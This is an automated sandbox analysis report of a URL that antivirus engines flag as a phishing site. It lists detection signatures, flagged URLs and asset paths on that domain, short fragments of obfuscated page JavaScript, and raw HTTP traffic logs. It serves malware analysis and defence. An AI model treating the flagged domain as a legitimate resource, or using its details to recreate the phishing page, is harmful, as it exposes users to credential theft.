Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://qdjtq.com/modify/

Overview

General Information

Sample URL:https://qdjtq.com/modify/
Analysis ID:1519928
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
HTML page contains obfuscated javascript
Found iframes
HTML body contains low number of good links
HTML page contains hidden javascript code
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 5348 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2000,i,5091690585223991164,14165352931940017661,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 6656 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://qdjtq.com/modify/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://qdjtq.com/modify/Avira URL Cloud: detection malicious, Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8munRy&sid=jnmURHTecJrkHRFxAHuGAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/modify/assets/d1a234c2ajMSD.jsAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/modify/assets/c27b6911ajMSD.jsAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muaSXAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mum-H&sid=jnmURHTecJrkHRFxAHuGAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/modify/assets/297557e4tE5dP.cssAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mudzw&sid=RcIlUwyZYMmWAnsPAHt1Avira URL Cloud: Label: phishing
Source: https://qdjtq.com/modify/layout/images/68.svgAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mukbh&sid=EAVYAwv8c3Wq9ksAAHuAAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=_2bdYdjJ6QcQscIJAHtyAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muq3U&sid=yXWikhQOZczjci5kAHuJAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/modify/layout/images/56.svgAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mujOQ&sid=cG417RpQ48wOMxxtAHt7Avira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mufNo&sid=N4xB_A2KRU780xSdAHt4Avira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mubv1&sid=_2bdYdjJ6QcQscIJAHtyAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=cjtByYZSYtIZzkm5AHtsAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mum-M&sid=jnmURHTecJrkHRFxAHuGAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=RcIlUwyZYMmWAnsPAHt1Avira URL Cloud: Label: phishing
Source: https://qdjtq.com/modify/layout/images/53.svgAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=3E0SqkwJomtmg_wKAHtvAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=yXWikhQOZczjci5kAHuJAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muoqpAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/favicon.icoAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/api/MC4yMTY3NjQ0NTM3Mjk2OTA5Avira URL Cloud: Label: phishing
Source: https://qdjtq.com/modify/layout/images/64.svgAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mukbn&sid=EAVYAwv8c3Wq9ksAAHuAAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mucF3&sid=_2bdYdjJ6QcQscIJAHtyAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=jnmURHTecJrkHRFxAHuGAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/modify/layout/images/57.svgAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/modify/assets/beb21690tE5dP.cssAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/modify/layout/images/67.svgAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muiHw&sid=cG417RpQ48wOMxxtAHt7Avira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mur3m&sid=VLhOORCLSY2MXW0LAHuPAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mulcg&sid=UFk3GnhaSs1mLKgMAHuDAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/modify/assets/7f8692c3ajMSD.jsAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muYmb&sid=cjtByYZSYtIZzkm5AHtsAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/modify/assets/e4b62962ajMSD.jsAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mubYvAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muf1IAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/modify/assets/ee4b0686tE5dP.cssAvira URL Cloud: Label: phishing
Source: https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muehQ&sid=RcIlUwyZYMmWAnsPAHt1Avira URL Cloud: Label: phishing
Source: https://qdjtq.com/modify/Virustotal: Detection: 17%Perma Link

Phishing

barindex
Source: https://qdjtq.com/modify/assets/7ae8a4f5ajMSD.jsHTTP Parser: const a19_0x5b7454=a19_0x4fa0;(function(_0x23dfe7,_0x52eff6){const _0x15ff47=a19_0x4fa0,_0x55c0f4=_0
Source: https://qdjtq.com/modify/assets/00b63b5cajMSD.jsHTTP Parser: (function(_0x87ecb3,_0x295b21){const _0x5402eb=a0_0x1f67,_0xcef53a=_0x87ecb3();while(!![]){try{const
Source: https://uzer.co/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-W4NBD3
Source: https://uzer.co/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-94GBDVKM3R&gacid=228618068.1727397051&gtm=45je49p0v867598331za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&_ng=1&aip=1&fledge=1&frm=0&tag_exp=101671035~101747727&z=1522954775
Source: https://uzer.co/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/10981864615?random=1727397050580&cv=11&fst=1727397050580&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
Source: https://uzer.co/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/10981864615?random=1727397050638&cv=11&fst=1727397050638&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&label=V20XCPG92OMDEKfpx_Qo&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&gtm_ee=1&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=event%3Dconversion&ct_cookie_present=0
Source: https://uzer.co/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-W4NBD3
Source: https://uzer.co/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-94GBDVKM3R&gacid=228618068.1727397051&gtm=45je49p0v867598331za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&_ng=1&aip=1&fledge=1&frm=0&tag_exp=101671035~101747727&z=1522954775
Source: https://uzer.co/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/10981864615?random=1727397050580&cv=11&fst=1727397050580&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
Source: https://uzer.co/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/10981864615?random=1727397050638&cv=11&fst=1727397050638&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&label=V20XCPG92OMDEKfpx_Qo&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&gtm_ee=1&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=event%3Dconversion&ct_cookie_present=0
Source: https://qdjtq.com/modify/HTTP Parser: Number of links: 0
Source: https://qdjtq.com/modify/HTTP Parser: Base64 decoded: V2-rf6aQErrLahHotf38SaOKw==
Source: https://qdjtq.com/modify/HTTP Parser: No favicon
Source: https://qdjtq.com/modify/HTTP Parser: No favicon
Source: https://qdjtq.com/modify/HTTP Parser: No favicon
Source: https://qdjtq.com/modify/HTTP Parser: No favicon
Source: https://www.servientrega.com/wps/portal/rastreo-envio/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziTS08TTwMTAz93f1cTAwCg5yMfP0MHT2NPQ30w8EKDHAARwP9KGL041EQhd_4cP0oPFYYOfoaQRXgMaMgNzTCINNREQC2ok6g/HTTP Parser: No favicon
Source: https://qdjtq.com/modify/HTTP Parser: No <meta name="author".. found
Source: https://uzer.co/HTTP Parser: No <meta name="author".. found
Source: https://uzer.co/HTTP Parser: No <meta name="author".. found
Source: https://qdjtq.com/modify/HTTP Parser: No <meta name="copyright".. found
Source: https://uzer.co/HTTP Parser: No <meta name="copyright".. found
Source: https://uzer.co/HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49759 version: TLS 1.0
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49826 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49914 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50215 version: TLS 1.2
Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49759 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: global trafficHTTP traffic detected: GET /modify/ HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/index-7c1edef8.js HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://qdjtq.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/f6170fbbtE5dP.css HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/7f8692c3ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://qdjtq.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/7ae8a4f5ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://qdjtq.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /modify/assets/index-7c1edef8.js HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/7f8692c3ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/297557e4tE5dP.css HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/ee4b0686tE5dP.css HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/afbbad07ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://qdjtq.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/09bf01f8ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://qdjtq.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/00b63b5cajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://qdjtq.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/522b5b49ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://qdjtq.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/7ae8a4f5ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/230e1227ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://qdjtq.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/c27b6911ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://qdjtq.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/09bf01f8ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/00b63b5cajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/afbbad07ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
